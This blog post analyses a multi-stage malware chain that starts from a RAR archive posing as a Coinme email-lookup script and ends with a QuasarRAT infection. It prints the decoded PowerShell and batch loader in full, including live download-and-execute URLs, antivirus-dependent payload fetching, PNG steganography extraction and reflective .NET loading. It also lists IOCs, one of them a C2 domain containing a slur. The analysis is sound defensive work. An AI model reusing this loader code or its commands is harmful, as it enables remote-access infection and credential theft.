After extracting the outer archive, we obtain another RAR file. Before unpacking it, we take a look at its contents in the hex view to check for anything suspicious.

xxd c67cc833d079aa60d662e2d5005b64340bb32f3b2f7d26e901ac0b1b33492f2f.rar| less

We can already see the suspicious ADS payload inside the RAR block.
With this confirmation, we proceed to extract the archive using 7-Zip.

After extraction, we obtain two files:

Coinme.py.txt
'Coinme.py.txt:.._.._.._.._.._.._AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_0fyhds341.vbs'

The file Coin.me.py.txt contains a simple Python script that queries email addresses of coinme.com users.
You can find the script here.

Now we get to the interesting part — the file:

Coinme.py.txt:.._.._.._.._.._.._AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_0fyhds341.vbs

It contains a short Visual Basic script:

The script downloads an HTML Application (HTA) file from a GitHub repository.
At the time of writing, both the repository and the user account have already been deleted. However, I uploaded a backup of the user’s repositories here.

Here is a screenshot of the repository and the associated profile:

Interestingly, the account only follows one inactive user with the Username “Levbohol / лев” :


Next, I inspected the verification.hta file that was downloaded from the repository.

The file contains a lightly obfuscated HTA script. I decoded the fromCharCode array into ASCII, resulting in the following code:

conhost.exe --headless cmd.exe /c powershell.exe -w h -ep bypass -c "
$t=Join-Path $env:TEMP 'svchost.bat'; 
Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/Proscaution32/tessttxd312/refs/heads/main/ilovelovelove.txt' -OutFile $t -UseBasicParsing;
if(Test-Path $t){
    & conhost.exe --headless cmd.exe /c $t
}"

The script downloads yet another file named ilovelovelove.txt and executes it.
Let’s take a closer look at that text file.

We are now looking at a heavily obfuscated DOS batch file. The first things that stand out are numerous variable assignments using set ... and comments prefixed with the REM keyword.

The comments are merely junk intended to distract the analyst.
The variable assignments, however, are more complicated.

Some of the variables are never used anywhere in the script, these are clearly junk statements meant to confuse the reader.
Other variables are used during execution and must be isolated and replaced with their actual runtime values.
We also encounter various uninitialized variables, which are also junk, since they never carry a value.

Before proceeding, I remove all comments from the file.

sed -i '/^[Rr][Ee][Mm]/d' ilovelovelove.txt 

Next, I isolate all variables that can be identified as junk, meaning variables that are referenced but never assigned a value.

grep -oE '%[^%]+%' ilovelovelove.txt > isolated_set_commands.txt
while read -r line; 
  do x=$(echo "$line" | sed 's/%//g'); res="$(grep $x ilovelovelove.txt | wc -l)"
  if [ $res -lt 2 ]; 
    then echo "$line"; 
  fi
done < isolated_set_commands.txt >> removable.txt
rm isolated_set_commands.txt

I then remove all uninitialized variables from the script completely.

while read -r line; do sed -i "s|$line||g" ilovelovelove.txt; done < removable.txt 

The script is now much cleaner, but some junk variables still remain. These were not properly filtered out because they were detected as variable placeholders inside strings.
To handle this, we isolate them and remove any variable that does not have a corresponding set assignment.

I also found many Base64 strings in the script, but none of them appear to form recognizable structures at this point, so we ignore them for now.
Next, we replace every remaining variable with its assigned value.

For this purpose, I wrote a small helper script:

#!/bin/bash
grep -oE '%[^%]+%' ilovelovelove_copy.txt > usable.txt

while read -r line; do 
    fstr="$(echo $line | sed 's/%//g')"
    x=$(grep "set $fstr" ilovelovelove_copy.txt | wc -l)


    if [ $x -lt 1 ]; then
        sed -i "s|$line||g" ilovelovelove_copy.txt 
        continue
    fi

    value=$(grep "set $fstr" ilovelovelove_copy.txt | cut -d'=' -f2 )
    echo "$line $value"
    clean_line=$(echo -n "$line")
    clean_value=$(echo -n "$value")
    sed -i "s|$clean_line|$clean_value|g" ilovelovelove_copy.txt
done < usable.txt

After running the helper script, the cleaned batch script now looks like this:

After removing all ^M carriage returns, we obtain the following finalized version:

>> Click to open script <<

start conhost.exe --headless powershell.exe -ep bypass -w h -NoExit -c "
$Ab1CdE t-CimInstance -Namespace 'rootSecurityCenter2' -ClassName AntiVirusProduct -ErrorAction SilentlyContinue;
$fGh2IjK $false;

if ($Ab1CdE) {
    foreach ($Lm3NoP in $Ab1CdE) {
        $Qr4StU $Lm3NoP.displayName;

        if ($Qr4StU -like '*ESET Security*') {
            $Vw5XyZ 'https://files.catbox.moe/4q6yuz.txt';
            $Ab6CdE-Object System.Net.WebClient;;
            $Ab6CdE.Headers.Add('User-Agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36');;
            $Ef7GhI b6CdE.DownloadString($Vw5XyZ);;
            $Ab6CdE.Dispose();;

            $u  ('From'+'Base64'+'String');
            $Ij8KlM System.Convert].GetMethod($u).Invoke($null, @([string]$Ef7GhI));
            $No9PqR System.Text.Encoding]::UTF8.GetString($Ij8KlM);

            Invoke-Expression $No9PqR;
            $fGh2IjK rue;
            break;
        };

        if ($Qr4StU -like '*Malwarebytes*' -or $Qr4StU -like '*F-Secure*') {
            $St0UvW https://files.catbox.moe/qt6070.txt';
            $Xy1ZaB ew-Object System.Net.WebClient;;
            $Xy1ZaB.Headers.Add('User-Agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36');;
            $Cd2EfG $Xy1ZaB.DownloadString($St0UvW);;
            $Xy1ZaB.Dispose();;

            $u  'From'+'Base64'+'String');
            $Gh3IjK  [System.Convert].GetMethod($u).Invoke($null, @([string]$Cd2EfG));
            $Lm4NoP  [System.Text.Encoding]::UTF8.GetString($Gh3IjK);

            Invoke-Expression $Lm4NoP;
            $fGh2IjK $true;
            break;
        };
    };
};

Add-Type -AssemblyName System.Drawing, System.IO.Compression.FileSystem;;

$Qr5StU 'https://i.ibb.co.com/NfC1jKn/yu42mu5xn.png';;
$Vw6XyZ-Object System.Net.WebClient;;
$Vw6XyZ.Headers.Add('User-Agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36');;

$Ab7CdE $Vw6XyZ.DownloadData($Qr5StU);;
$Vw6XyZ.Dispose();;

$Ef8GhI w-Object IO.MemoryStream(,$Ab7CdE);;
$Ij9KlM stem.Drawing.Bitmap]::FromStream($Ef8GhI);;

$No0PqR $Ij9KlM.GetPixel(0,0);;
$St1UvW $Ij9KlM.GetPixel(1,0);;

$size uint32]$No0PqR.R -shl 24) -bor ([uint32]$No0PqR.G -shl 16) -bor ([uint32]$No0PqR.B -shl 8) -bor [uint32]$St1UvW.R;

$Xy2ZaB w-Object System.Collections.Generic.List[byte];

for ($y; $y -lt $Ij9KlM.Height; $y++) {
    for ($x; $x -lt $Ij9KlM.Width; $x++) {
        if ( ($x -eq 0 -and $y -eq 0) -or ($x -eq 1 -and $y -eq 0) ) {
            continue;
        };

        $p 9KlM.GetPixel($x,$y);;

        $Xy2ZaB.Add($p.R);;
        $Xy2ZaB.Add($p.G);;
        $Xy2ZaB.Add($p.B);;
    };
};

$Ij9KlM.Dispose();;
$Ef8GhI.Dispose();;

$Cd3EfG $Xy2ZaB.ToArray()[0..($size-1)];;

$Gh4IjK w-Object IO.MemoryStream(,$Cd3EfG);;
$Lm5NoP w-Object IO.MemoryStream;;

$Qr6StU w-Object IO.Compression.GZipStream($Gh4IjK, );;
$Qr6StU.CopyTo($Lm5NoP);;

$Qr%MknH%.Dispose();;
$Gh4IjK.Dispose();;

$Vw7XyZ $Lm5NoP.ToArray();;
$Lm5NoP.Dispose();;

foreach ($Ab8CdE in [AppDomain]::CurrentDomain.GetAssemblies()) {
    if ($Ab8CdE.GlobalAssemblyCache -and $Ab8CdE.Location.Contains('mscor'+'lib.dll')) {
        foreach ($Ef9GhI in $Ab8CdE.GetType(('System.Reflection.Assembly')).GetMethods('Public,Static')) {
            if ($Ef9GhI.ToString()[37] -eq ']') {
                $Ij0KlM 9GhI.Invoke($null,(,$Vw7XyZ));;

                $No1PqR $Ij0KlM.EntryPoint;;
                $St2UvW $No1PqR.GetParameters().Count;;

                if ($St2UvW -eq 0) {
                    $No1PqR.Invoke($null,$null);
                } else {
                    $No1PqR.Invoke($null,(,@()));
                };

                break;
            };
        };

        break;
    };
}
"

Analysis – What does the script actually do?


1. Detection of installed antivirus products

The script queries root\SecurityCenter2 via WMI to identify installed antivirus solutions.
Depending on the detected product, it downloads different Base64-encoded payloads, decodes them, and executes them in memory using Invoke-Expression.

2. Downloading a hidden payload from a PNG file

Regardless of the antivirus result, the script then downloads a PNG image from a remote URL.
This PNG contains embedded binary data stored inside pixel values (steganography).

The script:

  • reads each pixel,
  • reconstructs byte arrays from RGB values,
  • uses two pixels as payload length markers,
  • extracts the payload portion,
  • decompresses it via GZIP.

The result is a .NET assembly (DLL) extracted directly into memory.

3. Reflective loading of the DLL

The DLL is never written to disk. Instead, it is:

  • loaded directly into memory,
  • executed via .NET reflection,
  • its entry point is invoked (with or without parameters).

This technique avoids leaving artifacts on disk and bypasses many detection mechanisms.

4. Execution of the final malware payload

The final payload, typically a stealer or remote-control module, runs fully in memory.

The PNG image

The PNG image looks like this:

(For security reasons, a watermark is embedded in the displayed version. You can download the original PNG here.)

To extract the payload from the image, we can use a small Python script (included in the GitHub repository).
This produces a file called stage2_payload.bin with the SHA256 hash d6775da94945ff5cbd26a1711f69cecdce981386983d2f504914630639563c36.

A quick VirusTotal scan provides additional details:

VirusTotal classifies the malware as Zusy (also known as Barys).
Zusy is an older but still active family of Windows malware. It has appeared for many years in small-scale campaigns and is typically used to steal credentials, browser information, or banking data. It is written in native C/C++, to confirm this i’ll take a look into the file with Ghidra.


When analyzing a binary in Ghidra, the presence of functions named .ctor or .cctor is a strong indicator that the file contains .NET managed code. These method names come directly from the Common Language Runtime (CLR) and follow the naming conventions defined by the ECMA-335 Common Language Infrastructure (CLI) specification.

This indicates that we are not dealing with a typical Zusy malware sample, as Zusy does not use .NET managed code in any part of its execution chain.


I also uploaded the file to abuse.ch, where it was classified as “QuasarRAT”. This classification makes sense, as QuasarRAT is a remote access trojan written entirely in .NET.

QuasarRAT is a well-known open-source Windows remote access tool that has been abused by cybercriminals for years. It provides features such as keylogging, credential theft, file management, remote command execution, and real-time system monitoring. Because it is written in .NET, it is frequently modified, repacked, or extended by threat actors, making it easy to customize and embed into multi-stage loaders.

It is also interesting to examine the domains contacted by the malware.

The malware first retrieves the host’s public IP address using ipwho.is, and then contacts its command-and-control (C2) server hosted on the domain:

ihatefaggots.cc

This should be considered as an additional IOC.